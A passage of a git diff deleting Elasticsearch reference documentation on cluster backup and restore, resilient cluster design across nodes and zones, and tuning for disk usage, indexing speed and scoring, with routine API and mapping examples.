-may not be able to perform a rolling restart. If you are performing a full
-restore of your configuration directory, we recommend a full cluster restart as
-the safest option. Alternatively, you may wish to restore your configuration
-files to a separate location on disk and use file comparison tools to review
-the differences between your existing configuration and the restored
-configuration.
---
diff --git a/docs/reference/high-availability/backup-cluster-config.asciidoc b/docs/reference/high-availability/backup-cluster-config.asciidoc
deleted file mode 100644
index 109227e8154..00000000000
--- a/docs/reference/high-availability/backup-cluster-config.asciidoc
+++ /dev/null
@@ -1,60 +0,0 @@
-[[backup-cluster-configuration]]
-=== Back up a cluster's configuration
-++++
-Back up the cluster configuration
-++++
-
-In addition to backing up the data in a cluster, it is important to back up its configuration--especially when the cluster becomes large and difficult to
-reconstruct.
-
-Configuration information resides in
-<> on every cluster node. Sensitive
-setting values, such as passwords for the {watcher} notification servers, are
-specified inside a binary secure container, the
-<> file. Some setting values are
-file paths to the associated configuration data, such as the ingest geo ip
-database. All these files are contained inside the `ES_PATH_CONF` directory.
-
-NOTE: All changes to configuration files are done by manually editing the files
-or using command line utilities, but *not* through APIs. In practice, these
-changes are infrequent after the initial setup.
-
-We recommend that you take regular (ideally, daily) backups of your {es} config
-(`$ES_PATH_CONF`) directory using the file backup software of your choice.
-
-TIP: We recommend that you have a configuration management plan for these
-configuration files. You may wish to check them into version control, or
-provision them through your choice of configuration management tool.
-
-Some of these files may contain sensitive data such as passwords and TLS keys,
-therefore you should investigate whether your backup software and/or storage
-solution are able to encrypt this data.
-
-Some settings in configuration files might be overridden by
-<>. You can capture these settings in
-a *data* backup snapshot by specifying the `include_global_state: true` (default)
-parameter for the snapshot API. Alternatively, you can extract these
-configuration values in text format by using the
-<>:
-
-[source,console]
---------------------------------------------------
-GET _cluster/settings?pretty&flat_settings&filter_path=persistent
--------------------------------------------------- 
-
-You can store the output of this as a file together with the rest of the
-configuration files.
-
-[NOTE]
-====
-
-* Transient settings are not considered for backup.
-* {es} {security-features} store configuration data such as role definitions and
-API keys inside a dedicated index. This "system" data
-complements the <> configuration and should
-be <>.
-* Other {stack} components, like Kibana and {ml-cap}, store their configuration
-data inside other dedicated indices. From the {es} perspective these are just data
-so you can use the regular <> process.
- -==== diff --git a/docs/reference/high-availability/backup-cluster-data.asciidoc b/docs/reference/high-availability/backup-cluster-data.asciidoc deleted file mode 100644 index 4053d6e47b6..00000000000 --- a/docs/reference/high-availability/backup-cluster-data.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[backup-cluster-data]] -=== Back up a cluster's data -++++ -Back up the data -++++ - -To back up your cluster's data, you can use the <>. - -include::../snapshot-restore/index.asciidoc[tag=snapshot-intro] - -[TIP] -==== -If your cluster has {es} {security-features} enabled, when you back up your data -the snapshot API call must be authorized. - -The `snapshot_user` role is a reserved role that can be assigned to the user -who is calling the snapshot endpoint. This is the only role necessary if all the user -does is periodic snapshots as part of the backup procedure. This role includes -the privileges to list all the existing snapshots (of any repository) as -well as list and view settings of all indices, including the `.security` index. -It does *not* grant privileges to create repositories, restore snapshots, or -search within indices. Hence, the user can view and snapshot all indices, but cannot -access or modify any data. - -For more information, see <> -and <>. -==== diff --git a/docs/reference/high-availability/backup-cluster.asciidoc b/docs/reference/high-availability/backup-cluster.asciidoc deleted file mode 100644 index 37490293554..00000000000 --- a/docs/reference/high-availability/backup-cluster.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[backup-cluster]] -== Back up a cluster - -include::../snapshot-restore/index.asciidoc[tag=backup-warning] - -To have a complete backup for your cluster: - -. <> -. <> -. <> - -To restore your cluster from a backup: - -. <> -. <> - - - -include::backup-cluster-data.asciidoc[] -include::backup-cluster-config.asciidoc[] -include::backup-and-restore-security-config.asciidoc[] -include::restore-cluster-data.asciidoc[] diff --git a/docs/reference/high-availability/cluster-design.asciidoc b/docs/reference/high-availability/cluster-design.asciidoc deleted file mode 100644 index 914db1a1d1f..00000000000 --- a/docs/reference/high-availability/cluster-design.asciidoc +++ /dev/null @@ -1,355 +0,0 @@ -[[high-availability-cluster-design]] -== Designing for resilience - -Distributed systems like {es} are designed to keep working even if some of -their components have failed. As long as there are enough well-connected -nodes to take over their responsibilities, an {es} cluster can continue -operating normally if some of its nodes are unavailable or disconnected. - -There is a limit to how small a resilient cluster can be. All {es} clusters -require: - -* One <> node -* At least one node for each <>. -* At least one copy of every <>. - -A resilient cluster requires redundancy for every required cluster component. -This means a resilient cluster must have: - -* At least three master-eligible nodes -* At least two nodes of each role -* At least two copies of each shard (one primary and one or more replicas) - -A resilient cluster needs three master-eligible nodes so that if one of -them fails then the remaining two still form a majority and can hold a -successful election. - -Similarly, redundancy of nodes of each role means that if a node for a -particular role fails, another node can take on its responsibilities. - -Finally, a resilient cluster should have at least two copies of each shard. If -one copy fails then there should be another good copy to take over. 
{es} -automatically rebuilds any failed shard copies on the remaining nodes in order -to restore the cluster to full health after a failure. - -Failures temporarily reduce the total capacity of your cluster. In addition, -after a failure the cluster must perform additional background activities to -restore itself to health. You should make sure that your cluster has the -capacity to handle your workload even if some nodes fail. - -Depending on your needs and budget, an {es} cluster can consist of a single -node, hundreds of nodes, or any number in between. When designing a smaller -cluster, you should typically focus on making it resilient to single-node -failures. Designers of larger clusters must also consider cases where multiple -nodes fail at the same time. The following pages give some recommendations for -building resilient clusters of various sizes: - -* <> -* <> - -[[high-availability-cluster-small-clusters]] -=== Resilience in small clusters - -In smaller clusters, it is most important to be resilient to single-node -failures. This section gives some guidance on making your cluster as resilient -as possible to the failure of an individual node. - -[[high-availability-cluster-design-one-node]] -==== One-node clusters - -If your cluster consists of one node, that single node must do everything. -To accommodate this, {es} assigns nodes every role by default. - -A single node cluster is not resilient. If the node fails, the cluster will -stop working. Because there are no replicas in a one-node cluster, you cannot -store your data redundantly. However, by default at least one replica is -required for a <>. To ensure your -cluster can report a `green` status, override the default by setting -<> to `0` on every index. - -If the node fails, you may need to restore an older copy of any lost indices -from a <>. - -Because they are not resilient to any failures, we do not recommend using -one-node clusters in production. - -[[high-availability-cluster-design-two-nodes]] -==== Two-node clusters - -If you have two nodes, we recommend they both be data nodes. You should also -ensure every shard is stored redundantly on both nodes by setting -<> to `1` on every index. -This is the default number of replicas but may be overridden by an -<>. <> can also achieve the same thing, but it's not necessary to use this -feature in such a small cluster. - -We recommend you set `node.master: false` on one of your two nodes so that it is -not <>. This means you can be certain which of your -nodes is the elected master of the cluster. The cluster can tolerate the loss of -the other master-ineligible node. If you don't set `node.master: false` on one -node, both nodes are master-eligible. This means both nodes are required for a -master election. Since the election will fail if either node is unavailable, -your cluster cannot reliably tolerate the loss of either node. - -By default, each node is assigned every role. We recommend you assign both nodes -all other roles except master eligibility. If one node fails, the other node can -handle its tasks. - -You should avoid sending client requests to just one of your nodes. If you do -and this node fails, such requests will not receive responses even if the -remaining node is a healthy cluster on its own. Ideally, you should balance your -client requests across both nodes. A good way to do this is to specify the -addresses of both nodes when configuring the client to connect to your cluster. 
-Alternatively, you can use a resilient load balancer to balance client requests -across the nodes in your cluster. - -Because it's not resilient to failures, we do not recommend deploying a two-node -cluster in production. - -[[high-availability-cluster-design-two-nodes-plus]] -==== Two-node clusters with a tiebreaker - -Because master elections are majority-based, the two-node cluster described -above is tolerant to the loss of one of its nodes but not the -other one. You cannot configure a two-node cluster so that it can tolerate -the loss of _either_ node because this is theoretically impossible. You might -expect that if either node fails then {es} can elect the remaining node as the -master, but it is impossible to tell the difference between the failure of a -remote node and a mere loss of connectivity between the nodes. If both nodes -were capable of running independent elections, a loss of connectivity would -lead to a {wikipedia}/Split-brain_(computing)[split-brain -problem] and therefore data loss. {es} avoids this and -protects your data by electing neither node as master until that node can be -sure that it has the latest cluster state and that there is no other master in -the cluster. This could result in the cluster having no master until -connectivity is restored. - -You can solve this problem by adding a third node and making all three nodes -master-eligible. A <> requires only -two of the three master-eligible nodes. This means the cluster can tolerate the -loss of any single node. This third node acts as a tiebreaker in cases where the -two original nodes are disconnected from each other. You can reduce the resource -requirements of this extra node by making it a <>, also known as a dedicated tiebreaker. -Because it has no other roles, a dedicated tiebreaker does not need to be as -powerful as the other two nodes. It will not perform any searches nor coordinate -any client requests and cannot be elected as the master of the cluster. - -The two original nodes should not be voting-only master-eligible nodes since a -resilient cluster requires at least three master-eligible nodes, at least two -of which are not voting-only master-eligible nodes. If two of your three nodes -are voting-only master-eligible nodes then the elected master must be the third -node. This node then becomes a single point of failure. - -We recommend assigning both non-tiebreaker nodes all other roles. This creates -redundancy by ensuring any task in the cluster can be handled by either node. - -You should not send any client requests to the dedicated tiebreaker node. -You should also avoid sending client requests to just one of the other two -nodes. If you do, and this node fails, then any requests will not -receive responses, even if the remaining nodes form a healthy cluster. Ideally, -you should balance your client requests across both of the non-tiebreaker -nodes. You can do this by specifying the address of both nodes -when configuring your client to connect to your cluster. Alternatively, you can -use a resilient load balancer to balance client requests across the appropriate -nodes in your cluster. The {ess-trial}[Elastic Cloud] service -provides such a load balancer. - -A two-node cluster with an additional tiebreaker node is the smallest possible -cluster that is suitable for production deployments. - -[[high-availability-cluster-design-three-nodes]] -==== Three-node clusters - -If you have three nodes, we recommend they all be <> and every index should have at least one replica. 
Nodes are data nodes -by default. You may prefer for some indices to have two replicas so that each -node has a copy of each shard in those indices. You should also configure each -node to be <> so that any two of them can hold a -master election without needing to communicate with the third node. Nodes are -master-eligible by default. This cluster will be resilient to the loss of any -single node. - -You should avoid sending client requests to just one of your nodes. If you do, -and this node fails, then any requests will not receive responses even if the -remaining two nodes form a healthy cluster. Ideally, you should balance your -client requests across all three nodes. You can do this by specifying the -address of multiple nodes when configuring your client to connect to your -cluster. Alternatively you can use a resilient load balancer to balance client -requests across your cluster. The {ess-trial}[Elastic Cloud] -service provides such a load balancer. - -[[high-availability-cluster-design-three-plus-nodes]] -==== Clusters with more than three nodes - -Once your cluster grows to more than three nodes, you can start to specialise -these nodes according to their responsibilities, allowing you to scale their -resources independently as needed. You can have as many <>, <>, <>, etc. as needed to -support your workload. As your cluster grows larger, we recommend using -dedicated nodes for each role. This lets you to independently scale resources -for each task. - -However, it is good practice to limit the number of master-eligible nodes in -the cluster to three. Master nodes do not scale like other node types since -the cluster always elects just one of them as the master of the cluster. If -there are too many master-eligible nodes then master elections may take a -longer time to complete. In larger clusters, we recommend you -configure some of your nodes as dedicated master-eligible nodes and avoid -sending any client requests to these dedicated nodes. Your cluster may become -unstable if the master-eligible nodes are overwhelmed with unnecessary extra -work that could be handled by one of the other nodes. - -You may configure one of your master-eligible nodes to be a -<> so that it can never be elected as the -master node. For instance, you may have two dedicated master nodes and a third -node that is both a data node and a voting-only master-eligible node. This -third voting-only node will act as a tiebreaker in master elections but will -never become the master itself. - -[[high-availability-cluster-design-small-cluster-summary]] -==== Summary - -The cluster will be resilient to the loss of any node as long as: - -- The <> is `green`. -- There are at least two data nodes. -- Every index has at least one replica of each shard, in addition to the - primary. -- The cluster has at least three master-eligible nodes, as long as at least two - of these nodes are not voting-only master-eligible nodes. -- Clients are configured to send their requests to more than one node or are - configured to use a load balancer that balances the requests across an - appropriate set of nodes. The {ess-trial}[Elastic Cloud] service provides such - a load balancer. - -[[high-availability-cluster-design-large-clusters]] -=== Resilience in larger clusters - -It is not unusual for nodes to share some common infrastructure, such as a power -supply or network router. If so, you should plan for the failure of this -infrastructure and ensure that such a failure would not affect too many of your -nodes. 
It is common practice to group all the nodes sharing some infrastructure -into _zones_ and to plan for the failure of any whole zone at once. - -Your cluster’s zones should all be contained within a single data centre. {es} -expects its node-to-node connections to be reliable and have low latency and -high bandwidth. Connections between data centres typically do not meet these -expectations. Although {es} will behave correctly on an unreliable or slow -network, it will not necessarily behave optimally. It may take a considerable -length of time for a cluster to fully recover from a network partition since it -must resynchronize any missing data and rebalance the cluster once the -partition heals. If you want your data to be available in multiple data centres, -deploy a separate cluster in each data centre and use -<> or <> to link the -clusters together. These features are designed to perform well even if the -cluster-to-cluster connections are less reliable or slower than the network -within each cluster. - -After losing a whole zone's worth of nodes, a properly-designed cluster may be -functional but running with significantly reduced capacity. You may need -to provision extra nodes to restore acceptable performance in your -cluster when handling such a failure. - -For resilience against whole-zone failures, it is important that there is a copy -of each shard in more than one zone, which can be achieved by placing data -nodes in multiple zones and configuring <>. You should also ensure that client requests are sent to nodes in -more than one zone. - -You should consider all node roles and ensure that each role is split -redundantly across two or more zones. For instance, if you are using -<> or {ml}, you should have ingest or {ml} nodes in two -or more zones. However, the placement of master-eligible nodes requires a little -more care because a resilient cluster needs at least two of the three -master-eligible nodes in order to function. The following sections explore the -options for placing master-eligible nodes across multiple zones. - -[[high-availability-cluster-design-two-zones]] -==== Two-zone clusters - -If you have two zones, you should have a different number of -master-eligible nodes in each zone so that the zone with more nodes will -contain a majority of them and will be able to survive the loss of the other -zone. For instance, if you have three master-eligible nodes then you may put -all of them in one zone or you may put two in one zone and the third in the -other zone. You should not place an equal number of master-eligible nodes in -each zone. If you place the same number of master-eligible nodes in each zone, -neither zone has a majority of its own. Therefore, the cluster may not survive -the loss of either zone. - -[[high-availability-cluster-design-two-zones-plus]] -==== Two-zone clusters with a tiebreaker - -The two-zone deployment described above is tolerant to the loss of one of its -zones but not to the loss of the other one because master elections are -majority-based. You cannot configure a two-zone cluster so that it can tolerate -the loss of _either_ zone because this is theoretically impossible. You might -expect that if either zone fails then {es} can elect a node from the remaining -zone as the master but it is impossible to tell the difference between the -failure of a remote zone and a mere loss of connectivity between the zones. 
If -both zones were capable of running independent elections then a loss of -connectivity would lead to a -{wikipedia}/Split-brain_(computing)[split-brain problem] and -therefore data loss. {es} avoids this and protects your data by not electing -a node from either zone as master until that node can be sure that it has the -latest cluster state and that there is no other master in the cluster. This may -mean there is no master at all until connectivity is restored. - -You can solve this by placing one master-eligible node in each of your two -zones and adding a single extra master-eligible node in an independent third -zone. The extra master-eligible node acts as a tiebreaker in cases -where the two original zones are disconnected from each other. The extra -tiebreaker node should be a <>, also known as a dedicated tiebreaker. A dedicated -tiebreaker need not be as powerful as the other two nodes since it has no other -roles and will not perform any searches nor coordinate any client requests nor -be elected as the master of the cluster. - -You should use <> to ensure -that there is a copy of each shard in each zone. This means either zone remains -fully available if the other zone fails. - -All master-eligible nodes, including voting-only nodes, are on the critical path -for publishing cluster state updates. Because of this, these nodes require -reasonably fast persistent storage and a reliable, low-latency network -connection to the rest of the cluster. If you add a tiebreaker node in a third -independent zone then you must make sure it has adequate resources and good -connectivity to the rest of the cluster. - -[[high-availability-cluster-design-three-zones]] -==== Clusters with three or more zones - -If you have three zones then you should have one master-eligible node in each -zone. If you have more than three zones then you should choose three of the -zones and put a master-eligible node in each of these three zones. This will -mean that the cluster can still elect a master even if one of the zones fails. - -As always, your indices should have at least one replica in case a node fails. -You should also use <> to -limit the number of copies of each shard in each zone. For instance, if you have -an index with one or two replicas configured then allocation awareness will -ensure that the replicas of the shard are in a different zone from the primary. -This means that a copy of every shard will still be available if one zone -fails. The availability of this shard will not be affected by such a -failure. - -[[high-availability-cluster-design-large-cluster-summary]] -==== Summary - -The cluster will be resilient to the loss of any zone as long as: - -- The <> is `green`. -- There are at least two zones containing data nodes. -- Every index has at least one replica of each shard, in addition to the - primary. -- Shard allocation awareness is configured to avoid concentrating all copies of - a shard within a single zone. -- The cluster has at least three master-eligible nodes. At least two of these - nodes are not voting-only master-eligible nodes, and they are spread evenly - across at least three zones. -- Clients are configured to send their requests to nodes in more than one zone - or are configured to use a load balancer that balances the requests across an - appropriate set of nodes. The {ess-trial}[Elastic Cloud] service provides such - a load balancer. 
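-
-To make the shard allocation awareness recommendation above concrete, here is a
-minimal sketch. It assumes that each node's `elasticsearch.yml` already sets a
-custom node attribute such as `node.attr.zone: zone-a` (the attribute name
-`zone` and the zone names are examples, not requirements). The dynamic cluster
-setting below then tells {es} to spread the copies of each shard across the
-values of that attribute:
-
-[source,console]
---------------------------------------------------
-PUT _cluster/settings
-{
-  "persistent": {
-    "cluster.routing.allocation.awareness.attributes": "zone"
-  }
-}
--------------------------------------------------- 
-
-With this in place, {es} tries to keep a primary and its replicas in different
-zones, so the failure of a whole zone does not remove every copy of a shard.
-The shard allocation awareness settings also include a forced awareness option
-if you want to stop {es} from allocating every copy onto the surviving zones
-after a failure.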
diff --git a/docs/reference/high-availability/restore-cluster-data.asciidoc b/docs/reference/high-availability/restore-cluster-data.asciidoc deleted file mode 100644 index da58e8c4f3e..00000000000 --- a/docs/reference/high-availability/restore-cluster-data.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[restore-cluster-data]] -=== Restore a cluster's data -++++ -Restore the data -++++ - -include::../snapshot-restore/index.asciidoc[tag=restore-intro] - -[TIP] -==== -If your cluster has {es} {security-features} enabled, the restore API requires the `manage` cluster privilege. There is no bespoke role for the restore process. This privilege is very permissive and should only -be granted to users in the "administrator" category. Specifically, it allows -malicious users to exfiltrate data to a location of their choosing. Automated -tools should not run as users with this privilege. -==== diff --git a/docs/reference/how-to.asciidoc b/docs/reference/how-to.asciidoc deleted file mode 100644 index 8d11b947cc3..00000000000 --- a/docs/reference/how-to.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[how-to]] -= How To - -[partintro] --- -Elasticsearch ships with defaults which are intended to give a good out of -the box experience. Full text search, highlighting, aggregations, and indexing -should all just work without the user having to change anything. - -Once you better understand how you want to use Elasticsearch, however, -there are a number of optimizations you can make to improve performance -for your use case. - -This section provides guidance about which changes should and shouldn't be -made. --- - -include::how-to/general.asciidoc[] - -include::how-to/recipes.asciidoc[] - -include::how-to/indexing-speed.asciidoc[] - -include::how-to/search-speed.asciidoc[] - -include::how-to/disk-usage.asciidoc[] - -include::how-to/size-your-shards.asciidoc[] \ No newline at end of file diff --git a/docs/reference/how-to/disk-usage.asciidoc b/docs/reference/how-to/disk-usage.asciidoc deleted file mode 100644 index cac21e3080f..00000000000 --- a/docs/reference/how-to/disk-usage.asciidoc +++ /dev/null @@ -1,194 +0,0 @@ -[[tune-for-disk-usage]] -== Tune for disk usage - -[discrete] -=== Disable the features you do not need - -By default Elasticsearch indexes and adds doc values to most fields so that they -can be searched and aggregated out of the box. For instance if you have a numeric -field called `foo` that you need to run histograms on but that you never need to -filter on, you can safely disable indexing on this field in your -<>: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "integer", - "index": false - } - } - } -} --------------------------------------------------- - -<> fields store normalization factors in the index in order to be -able to score documents. If you only need matching capabilities on a `text` -field but do not care about the produced scores, you can configure Elasticsearch -to not write norms to the index: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "text", - "norms": false - } - } - } -} --------------------------------------------------- - -<> fields also store frequencies and positions in the index by -default. Frequencies are used to compute scores and positions are used to run -phrase queries. 
If you do not need to run phrase queries, you can tell -Elasticsearch to not index positions: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "text", - "index_options": "freqs" - } - } - } -} --------------------------------------------------- - -Furthermore if you do not care about scoring either, you can configure -Elasticsearch to just index matching documents for every term. You will -still be able to search on this field, but phrase queries will raise errors -and scoring will assume that terms appear only once in every document. - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "text", - "norms": false, - "index_options": "freqs" - } - } - } -} --------------------------------------------------- - -[discrete] -[[default-dynamic-string-mapping]] -=== Don't use default dynamic string mappings - -The default <> will index string fields -both as <> and <>. This is wasteful if you only -need one of them. Typically an `id` field will only need to be indexed as a -`keyword` while a `body` field will only need to be indexed as a `text` field. - -This can be disabled by either configuring explicit mappings on string fields -or setting up dynamic templates that will map string fields as either `text` -or `keyword`. - -For instance, here is a template that can be used in order to only map string -fields as `keyword`: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "dynamic_templates": [ - { - "strings": { - "match_mapping_type": "string", - "mapping": { - "type": "keyword" - } - } - } - ] - } -} --------------------------------------------------- - -[discrete] -=== Watch your shard size - -Larger shards are going to be more efficient at storing data. To increase the size of your shards, you can decrease the number of primary shards in an index by <> with fewer primary shards, creating fewer indices (e.g. by leveraging the <>), or modifying an existing index using the <>. - -Keep in mind that large shard sizes come with drawbacks, such as long full recovery times. - -[discrete] -[[disable-source]] -=== Disable `_source` - -The <> field stores the original JSON body of the document. If you don’t need access to it you can disable it. However, APIs that needs access to `_source` such as update and reindex won’t work. - -[discrete] -[[best-compression]] -=== Use `best_compression` - -The `_source` and stored fields can easily take a non negligible amount of disk -space. They can be compressed more aggressively by using the `best_compression` -<>. - -[discrete] -=== Force Merge - -Indices in Elasticsearch are stored in one or more shards. Each shard is a Lucene index and made up of one or more segments - the actual files on disk. Larger segments are more efficient for storing data. - -The <> can be used to reduce the number of segments per shard. In many cases, the number of segments can be reduced to one per shard by setting `max_num_segments=1`. - -[discrete] -=== Shrink Index - -The <> allows you to reduce the number of shards in an index. Together with the Force Merge API above, this can significantly reduce the number of shards and segments of an index. - -[discrete] -=== Use the smallest numeric type that is sufficient - -The type that you pick for <> can have a significant impact -on disk usage. 
In particular, integers should be stored using an integer type -(`byte`, `short`, `integer` or `long`) and floating points should either be -stored in a `scaled_float` if appropriate or in the smallest type that fits the -use-case: using `float` over `double`, or `half_float` over `float` will help -save storage. - -[discrete] -=== Use index sorting to colocate similar documents - -When Elasticsearch stores `_source`, it compresses multiple documents at once -in order to improve the overall compression ratio. For instance it is very -common that documents share the same field names, and quite common that they -share some field values, especially on fields that have a low cardinality or -a {wikipedia}/Zipf%27s_law[zipfian] distribution. - -By default documents are compressed together in the order that they are added -to the index. If you enabled <> -then instead they are compressed in sorted order. Sorting documents with similar -structure, fields, and values together should improve the compression ratio. - -[discrete] -=== Put fields in the same order in documents - -Due to the fact that multiple documents are compressed together into blocks, -it is more likely to find longer duplicate strings in those `_source` documents -if fields always occur in the same order. - -[discrete] -[[roll-up-historical-data]] -=== Roll up historical data - -Keeping older data can useful for later analysis but is often avoided due to -storage costs. You can use data rollups to summarize and store historical data -at a fraction of the raw data's storage cost. See <>. diff --git a/docs/reference/how-to/general.asciidoc b/docs/reference/how-to/general.asciidoc deleted file mode 100644 index 4a9331194d9..00000000000 --- a/docs/reference/how-to/general.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[general-recommendations]] -== General recommendations - -[discrete] -[[large-size]] -=== Don't return large result sets - -Elasticsearch is designed as a search engine, which makes it very good at -getting back the top documents that match a query. However, it is not as good -for workloads that fall into the database domain, such as retrieving all -documents that match a particular query. If you need to do this, make sure to -use the <> API. - -[discrete] -[[maximum-document-size]] -=== Avoid large documents - -Given that the default <> is set to -100MB, Elasticsearch will refuse to index any document that is larger than -that. You might decide to increase that particular setting, but Lucene still -has a limit of about 2GB. - -Even without considering hard limits, large documents are usually not -practical. Large documents put more stress on network, memory usage and disk, -even for search requests that do not request the `_source` since Elasticsearch -needs to fetch the `_id` of the document in all cases, and the cost of getting -this field is bigger for large documents due to how the filesystem cache works. -Indexing this document can use an amount of memory that is a multiplier of the -original size of the document. Proximity search (phrase queries for instance) -and <> also become more expensive -since their cost directly depends on the size of the original document. - -It is sometimes useful to reconsider what the unit of information should be. -For instance, the fact you want to make books searchable doesn't necessarily -mean that a document should consist of a whole book. 
It might be a better idea
-to use chapters or even paragraphs as documents, and then have a property in
-these documents that identifies which book they belong to. This not only
-avoids the issues with large documents, it also makes the search experience
-better. For instance, if a user searches for two words `foo` and `bar`, a match
-across different chapters is probably very poor, while a match within the same
-paragraph is likely good.
-
diff --git a/docs/reference/how-to/indexing-speed.asciidoc b/docs/reference/how-to/indexing-speed.asciidoc
deleted file mode 100644
index 8da7bb199fd..00000000000
--- a/docs/reference/how-to/indexing-speed.asciidoc
+++ /dev/null
@@ -1,147 +0,0 @@
-[[tune-for-indexing-speed]]
-== Tune for indexing speed
-
-[discrete]
-=== Use bulk requests
-
-Bulk requests will yield much better performance than single-document index
-requests. In order to know the optimal size of a bulk request, you should run
-a benchmark on a single node with a single shard. First try to index 100
-documents at once, then 200, then 400, etc., doubling the number of documents
-in a bulk request in every benchmark run. When the indexing speed starts to
-plateau, you know you have reached the optimal size of a bulk request for your
-data. In case of a tie, it is better to err on the side of too few rather
-than too many documents. Beware that overly large bulk requests might put the
-cluster under memory pressure when many of them are sent concurrently, so
-it is advisable to avoid going beyond a couple of tens of megabytes per request
-even if larger requests seem to perform better.
-
-[discrete]
-[[multiple-workers-threads]]
-=== Use multiple workers/threads to send data to Elasticsearch
-
-A single thread sending bulk requests is unlikely to be able to max out the
-indexing capacity of an Elasticsearch cluster. In order to use all resources
-of the cluster, you should send data from multiple threads or processes. In
-addition to making better use of the resources of the cluster, this should
-help reduce the cost of each fsync.
-
-Make sure to watch for `TOO_MANY_REQUESTS (429)` response codes
-(`EsRejectedExecutionException` with the Java client), which is the way that
-Elasticsearch tells you that it cannot keep up with the current indexing rate.
-When it happens, you should pause indexing a bit before trying again, ideally
-with randomized exponential backoff.
-
-Similarly to sizing bulk requests, only testing can tell what the optimal
-number of workers is. This can be tested by progressively increasing the
-number of workers until either I/O or CPU is saturated on the cluster.
-
-[discrete]
-=== Unset or increase the refresh interval
-
-The operation that consists of making changes visible to search - called a
-<> - is costly, and calling it often while there is
-ongoing indexing activity can hurt indexing speed.
-
-include::{es-repo-dir}/indices/refresh.asciidoc[tag=refresh-interval-default]
-This is the optimal configuration if you have no or very little search traffic
-(e.g. less than one search request every 5 minutes) and want to optimize for
-indexing speed. This behavior aims to automatically optimize bulk indexing in
-the default case when no searches are performed. In order to opt out of this
-behavior, set the refresh interval explicitly.
-
-On the other hand, if your index experiences regular search requests, this
-default behavior means that Elasticsearch will refresh your index every 1
-second.
If you can afford to increase the amount of time between when a document -gets indexed and when it becomes visible, increasing the -<> to a larger value, e.g. -`30s`, might help improve indexing speed. - -[discrete] -=== Disable replicas for initial loads - -If you have a large amount of data that you want to load all at once into -Elasticsearch, it may be beneficial to set `index.number_of_replicas` to `0` in -order to speed up indexing. Having no replicas means that losing a single node -may incur data loss, so it is important that the data lives elsewhere so that -this initial load can be retried in case of an issue. Once the initial load is -finished, you can set `index.number_of_replicas` back to its original value. - -If `index.refresh_interval` is configured in the index settings, it may further -help to unset it during this initial load and setting it back to its original -value once the initial load is finished. - -[discrete] -=== Disable swapping - -You should make sure that the operating system is not swapping out the java -process by <>. - -[discrete] -=== Give memory to the filesystem cache - -The filesystem cache will be used in order to buffer I/O operations. You should -make sure to give at least half the memory of the machine running Elasticsearch -to the filesystem cache. - -[discrete] -=== Use auto-generated ids - -When indexing a document that has an explicit id, Elasticsearch needs to check -whether a document with the same id already exists within the same shard, which -is a costly operation and gets even more costly as the index grows. By using -auto-generated ids, Elasticsearch can skip this check, which makes indexing -faster. - -[discrete] -=== Use faster hardware - -If indexing is I/O bound, you should investigate giving more memory to the -filesystem cache (see above) or buying faster drives. In particular SSD drives -are known to perform better than spinning disks. Always use local storage, -remote filesystems such as `NFS` or `SMB` should be avoided. Also beware of -virtualized storage such as Amazon's `Elastic Block Storage`. Virtualized -storage works very well with Elasticsearch, and it is appealing since it is so -fast and simple to set up, but it is also unfortunately inherently slower on an -ongoing basis when compared to dedicated local storage. If you put an index on -`EBS`, be sure to use provisioned IOPS otherwise operations could be quickly -throttled. - -Stripe your index across multiple SSDs by configuring a RAID 0 array. Remember -that it will increase the risk of failure since the failure of any one SSD -destroys the index. However this is typically the right tradeoff to make: -optimize single shards for maximum performance, and then add replicas across -different nodes so there's redundancy for any node failures. You can also use -<> to backup the index for further -insurance. - -[discrete] -=== Indexing buffer size - -If your node is doing only heavy indexing, be sure -<> is large enough to give -at most 512 MB indexing buffer per shard doing heavy indexing (beyond that -indexing performance does not typically improve). Elasticsearch takes that -setting (a percentage of the java heap or an absolute byte-size), and -uses it as a shared buffer across all active shards. Very active shards will -naturally use this buffer more than shards that are performing lightweight -indexing. 
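As a sketch only, such an override is a static node setting in
`elasticsearch.yml`; the `20%` value below is purely illustrative and should
come from your own benchmarks rather than be copied as-is:

[source,yaml]
----
# Illustrative only: give heavy-indexing nodes a larger shared indexing
# buffer. The setting accepts a percentage of the heap or an absolute size.
indices.memory.index_buffer_size: 20%
----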
- -The default is `10%` which is often plenty: for example, if you give the JVM -10GB of memory, it will give 1GB to the index buffer, which is enough to host -two shards that are heavily indexing. - -[discrete] -=== Use {ccr} to prevent searching from stealing resources from indexing - -Within a single cluster, indexing and searching can compete for resources. By -setting up two clusters, configuring <> to replicate data from -one cluster to the other one, and routing all searches to the cluster that has -the follower indices, search activity will no longer steal resources from -indexing on the cluster that hosts the leader indices. - -[discrete] -=== Additional optimizations - -Many of the strategies outlined in <> also -provide an improvement in the speed of indexing. diff --git a/docs/reference/how-to/recipes.asciidoc b/docs/reference/how-to/recipes.asciidoc deleted file mode 100644 index b46f624aef5..00000000000 --- a/docs/reference/how-to/recipes.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[recipes]] -== Recipes - -This section includes a few recipes to help with common problems: - -* <> -* <> -* <> - -include::recipes/stemming.asciidoc[] -include::recipes/scoring.asciidoc[] diff --git a/docs/reference/how-to/recipes/scoring.asciidoc b/docs/reference/how-to/recipes/scoring.asciidoc deleted file mode 100644 index 47a3622aabf..00000000000 --- a/docs/reference/how-to/recipes/scoring.asciidoc +++ /dev/null @@ -1,199 +0,0 @@ -[[consistent-scoring]] -=== Getting consistent scoring - -The fact that Elasticsearch operates with shards and replicas adds challenges -when it comes to having good scoring. - -[discrete] -==== Scores are not reproducible - -Say the same user runs the same request twice in a row and documents do not come -back in the same order both times, this is a pretty bad experience isn't it? -Unfortunately this is something that can happen if you have replicas -(`index.number_of_replicas` is greater than 0). The reason is that Elasticsearch -selects the shards that the query should go to in a round-robin fashion, so it -is quite likely if you run the same query twice in a row that it will go to -different copies of the same shard. - -Now why is it a problem? Index statistics are an important 